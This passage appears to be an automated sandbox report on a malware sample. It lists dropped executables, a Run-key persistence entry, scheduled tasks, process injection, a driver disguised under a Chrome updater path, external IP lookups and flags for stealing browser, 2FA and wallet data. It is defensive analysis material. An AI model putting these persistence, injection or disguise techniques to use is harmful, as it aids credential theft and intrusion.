N/A N/A C:\Users\Admin\AppData\Local\Temp\61EA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestplayer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\996B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D73.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C698.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\evuvcij N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3302.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a8e00b3b-feb7-4dae-ba08-83e179d90546\\3302.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\3302.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2244 set thread context of 852 N/A C:\Users\Admin\AppData\Local\Temp\3302.exe C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 4328 set thread context of 3708 N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3084 set thread context of 904 N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 1404 set thread context of 4484 N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 536 set thread context of 2000 N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 2184 set thread context of 4896 N/A N/A C:\Users\Admin\AppData\Local\Temp\B949.exe
PID 4308 set thread context of 5000 N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 1036 set thread context of 2196 N/A C:\Users\Admin\AppData\Local\Temp\78EF.exe C:\Users\Admin\AppData\Local\Temp\78EF.exe
PID 440 set thread context of 5064 N/A C:\Users\Admin\AppData\Local\Temp\6E21.exe C:\Users\Admin\AppData\Local\Temp\6E21.exe
PID 3848 set thread context of 4656 N/A C:\Users\Admin\AppData\Local\Temp\5AE3.exe C:\Users\Admin\AppData\Local\Temp\5AE3.exe
PID 816 set thread context of 4432 N/A C:\Users\Admin\AppData\Local\Temp\64AA.exe C:\Users\Admin\AppData\Local\Temp\64AA.exe
PID 3444 set thread context of 4628 N/A C:\Windows\System32\Conhost.exe C:\Users\Admin\AppData\Local\Temp\B949.exe
PID 4360 set thread context of 3988 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4360 set thread context of 2764 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 2060 set thread context of 5040 N/A C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe C:\Users\Admin\AppData\Local\a8de813c-c6c1-4451-8d11-24e090b0be78\build2.exe
PID 2936 set thread context of 4620 N/A C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe C:\Users\Admin\AppData\Local\5f01f9a3-a029-4b78-a1d3-9f0377fbc94e\build2.exe
PID 2428 set thread context of 4500 N/A C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe C:\Users\Admin\AppData\Local\ef8c009f-72cb-4cbf-ac69-3b3172b08118\build2.exe
PID 2468 set thread context of 2248 N/A C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe C:\Users\Admin\AppData\Local\ad558e8f-7aba-439b-b652-197b14c7f381\build2.exe
PID 5068 set thread context of 4988 N/A C:\Users\Admin\AppData\Local\Temp\8F29.exe C:\Users\Admin\AppData\Local\Temp\8F29.exe
PID 3480 set thread context of 3180 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\3302.exe
PID 1096 set thread context of 3620 N/A C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe C:\Users\Admin\AppData\Local\8cbfee9f-7f10-422d-a15a-377685066034\build2.exe
PID 1836 set thread context of 3716 N/A C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe C:\Users\Admin\AppData\Local\12d9b32b-674f-4cac-ba38-55f5f5fac00b\build2.exe
PID 1348 set thread context of 744 N/A C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe C:\Users\Admin\AppData\Local\09b38451-d3bf-4da3-abdc-ba2bde48b956\build2.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000003001\latestX.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76aa2d02f34135fd7cb03ad8426fc44cbfbe3ab94493a984df702fbf4975fccc.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\61EA.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
